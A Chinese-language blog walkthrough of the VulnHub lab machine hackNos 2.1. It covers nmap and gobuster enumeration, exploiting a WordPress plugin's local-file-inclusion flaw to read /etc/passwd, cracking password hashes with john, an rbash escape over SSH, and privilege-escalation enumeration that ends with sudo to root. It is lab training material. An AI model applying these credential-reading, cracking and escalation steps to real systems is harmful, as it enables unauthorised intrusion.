这是我完成的VulnHub上的第38个靶机。
靶机地址](https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/)
难度:简单-中等
靶机发布日期:2019年11月29日
靶机描述:Difficulty : Easy to Intermediate
Flag : 2 Flag first user And second root
Learning : Web Application | Enumeration | Password Cracking
Changelog - 2019-12-13 ~ v1.1 - 2019-11-29 ~ v1.0
博客中如有任何问题,恳请批评指正,万分感谢。个人邮箱:[email protected]
工具、知识点和漏洞
- nmap
- gobuster
- searchsploit
- wpscan
- john
- LFI漏洞
- rbash逃逸
0x00、信息收集
靶机IP:192.168.56.101
nmap -sn 192.168.56.0/24
端口和服务
nmap -sS -T5 -A -p- 192.168.56.101
页面、目录枚举
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip ## 没结果
gobuster dir -u http://192.168.56.101 -w ~/Desktop/SecLists/Discovery/Web-Content/raft-large-directories.txt -x .php,.txt,.html,.zip,.bak ## 字典是Github上的SecLists
通过插件Wappalyzer发现是WordPress
查看网站的过程中发现有些图片没有加载成功,并且还有一个链接指向了hacknos.ova。在/etc/hosts文件中添加了如下记录后,可正常显示图片。
由于网站是WordPress模板创建的,所以先用wpscan扫描一下,发现使用了存在LFI漏洞的插件。
直接访问https://www.exploit-db.com/exploits/46537查看PoC。包含一下/etc/passwd,发现flag用户的加密密码$1$flag$vqjCxzjtRc7PofLYS2lWf/,从密文中的$1$可以知道这里使用的加密算法是md5。还有两个信息:用户rohit;flag用户的默认shell是rbash,这个后面可能需要进行逃逸。
下面使用john对密码进行爆破。john支持的破解的加密算法(说是加密算法可能不够准确)如下图所示:
john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt hash
john --show hash
0x01、权限提升
使用flag:topsecret通过SSH登录靶机,发现cd命令无法使用,因为当前用户的shell是rbash。这是一个命令受限的shell。想到之前做过的一个靶机『VulnHub系列』Gears of War: EP#1-Walkthrough使用了一个比较方便的逃逸rbash的方法,这里直接拿来用。
ssh [email protected] -t "bash --noprofile"
2020-01-23更新:新增:basic-linux-privilege-escalation
--------------------------------------------------------------Begin 套话分割线 Begin--------------------------------------------------------------
关于Linux提权,可以直接用脚本搜集一下对于提权有用的信息,比如用linuxprivchecker.py、LinEnum.sh.
如果你想熟悉一下没有脚本的情况下怎么收集这些信息可以参考privilege_escalation_-_linux
先在kali上开启HTTP服务
python -m SimpleHTTPServer 65534
使用wget下载linuxprivchecker.py脚本到靶机的tmp目录
因为本人所在的地理位置不允许直接访问Github,所以我是从自己的kali下载的
cd /tmp
wget http://192.168.0.108:65534/Desktop/linuxprivchecker.py
为了便于查看收集到的信息,我将结果输出到report.txt文本中,之后使用less查看
python linuxprivchecker.py > report.txt
less report.txt
靶机做了这些后发现还是手动收集更快……,手动收集不到有效信息的情况下再尝试用脚本。
-------------------------------------------------------------- End 套话分割线 End --------------------------------------------------------------
查找sudo权限命令,提示flag用户没有权限使用sudo命令。
sudo -l
SUID权限可执行文件,没有可用的
find / -perm -u=s -type f 2>/dev/null
常见的SUID提权可执行文件
- nmap
- vim
- less
- more
- nano
- cp
- mv
- find
- wget
- bash
当前用户可写文件。我先把结果输出到文本文件,然后使用grep加上关键字去筛选。最后发现除了有数据库用户名和密码的wp-config.php这个配置文件外,其他的都没啥用。
find / -writable -type f 2>/dev/null >/tmp/report.txt
grep -Ev '/proc|/sys' /tmp/report.txt
查看计划任务,无。
cat /etc/crontab
内核版本。这里我没有尝试内核提权这种方式,有兴趣的童鞋可以试一下。
跑一下脚本,得到如下信息:
[-] Sudo version:
Sudo version 1.8.21p2
flag用户无法执行sudo命令。
[-] MYSQL version:
mysql Ver 14.14 Distrib 5.7.27, for Linux (x86_64) using EditLine wrapper
搜索之后发现当前版本不存在提权漏洞
/var/backups文件夹中存在一些备份文件,然后就到这个文件夹下面看了看,最后发现了用户的密码的备份文件。因为密文的salt是rohit,所以猜测这个密文对应的就是rohit的密码。
继续使用john爆破一下密码,得到!%hack41,测试之后发现确实是rohit用户的密码。
执行sudo -l命令之后发现,能够以root权限执行命令,直接sudo su -切换到root用户。
如果你有其他的方法,欢迎留言。若文中有任务错误,恳请批评指正!!!
